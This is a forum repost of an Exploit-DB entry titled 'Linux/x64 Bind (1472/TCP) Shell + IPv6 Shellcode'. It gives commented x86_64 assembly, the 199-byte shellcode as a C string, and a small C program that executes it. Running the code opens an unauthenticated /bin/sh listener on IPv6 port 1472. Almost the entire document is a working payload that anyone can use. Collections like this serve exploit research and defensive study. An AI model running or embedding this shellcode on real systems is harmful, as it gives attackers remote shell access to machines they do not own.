Exploit Linux/x64 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39758
Проверка EDB
  1. Пройдено
Автор
ROZIUL HASAN KHAN SHIFAT
Тип уязвимости
SHELLCODE
Платформа
LINUX_X86-64
CVE
N/A
Дата публикации
2016-05-04
Linux/x64 - Bind (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
C:
/*
 # Title : Linux x86_64 bind tcp : port 1472 ipv6
 # Date : 02/05/2016
 # Author : Roziul Hasan Khan Shifat
 # Tested On : Ubuntu 14.04 LTS x86_64
 # Contact : [email protected]
*/

/*

section .text
	global _start
_start:

;;socket()
xor rax,rax

push 6
push 0x1
push 10

pop rdi
pop rsi
pop rdx

mov al,41 ;socket()

syscall

;------------------------------------

xor r15,r15

mov r15,rax ;storing socket descriptor

;-------------------- 

;fork()


xor rax,rax
mov al,57
xor rdi,rdi
syscall

;-------------------

xor rdi,rdi
cmp rax,rdi

je ps

;-------------
;exit()
xor rax,rax
mov al,60
syscall
;--------------

ps:

;----------------
;bind()
xor rax,rax

push byte 28
pop rdx ;sizeof struct sock_addrin6

push rax ;sin6_scope_id

push rax ;sin6_addr
push rax ;sin6_addr

push rax ;sin6_flowinfo

push word 0xc005 ;sin6_port (htons(1472)) (U may change it)
	
push word 10 ;sin6_family

push rsp

pop rsi

mov rdi,r15 ;scoket des

mov al,49
syscall

;---------------------------------------
;listen()

mov rdi,r15
xor rsi,rsi
add rsi,2

xor rax,rax
mov al,50
syscall
;------------------------------------
;accept()

xor r9,r9
xor rdx,rdx
xor rsi,rsi
xor rax,rax

mov rdi,r15
mov dl,28

mov al,43
syscall
;------------------

mov r9,rax ;storing client descriptor

;-------------------
;close() closing socket descriptor
xor rax,rax

mov rdi,r15

mov al,3
syscall
;------------------

;;dup2(cd,0)
xor rsi,rsi
mul rsi

mov rdi,r9
mov al,33
syscall

;------------

;------------------

;;dup2(cd,1)
xor rax,rax
inc rsi

mov rdi,r9
mov al,33
syscall

;------------

;------------------

;;dup2(cd,2)
xor rax,rax
inc rsi

mov rdi,r9
mov al,33
syscall
jmp exe
;------------

exe:

;exeve(//bin/sh)
xor rdx,rdx
xor rsi,rsi
xor rdi,rdi
mul rdi

mov r10, 0x68732f6e69622f2f

shr r10,8;shift right 8 bit

push r10
push rsp
pop rdi

mov al,59
syscall

*/


#include<stdio.h>
#include<string.h>
char shellcode[] ="\x48\x31\xc0\x6a\x06\x6a\x01\x6a\x0a\x5f\x5e\x5a\xb0\x29\x0f\x05\x4d\x31\xff\x49\x89\xc7\x48\x31\xc0\xb0\x39\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\x48\x31\xc0\x6a\x1c\x5a\x50\x50\x50\x50\x66\x68\x05\xc0\x66\x6a\x0a\x54\x5e\x4c\x89\xff\xb0\x31\x0f\x05\x4c\x89\xff\x48\x31\xf6\x48\x83\xc6\x02\x48\x31\xc0\xb0\x32\x0f\x05\x4d\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xc0\x4c\x89\xff\xb2\x1c\xb0\x2b\x0f\x05\x49\x89\xc1\x48\x31\xc0\x4c\x89\xff\xb0\x03\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x4c\x89\xcf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x4c\x89\xcf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x4c\x89\xcf\xb0\x21\x0f\x05\xeb\x00\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\xf7\xe7\x49\xba\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xea\x08\x41\x52\x54\x5f\xb0\x3b\x0f\x05";

main()
{

printf("shellcode length %ld\n",(unsigned long)strlen(shellcode));

(* (int(*)()) shellcode) ();


return 0;
}
 
Источник
www.exploit-db.com

Похожие темы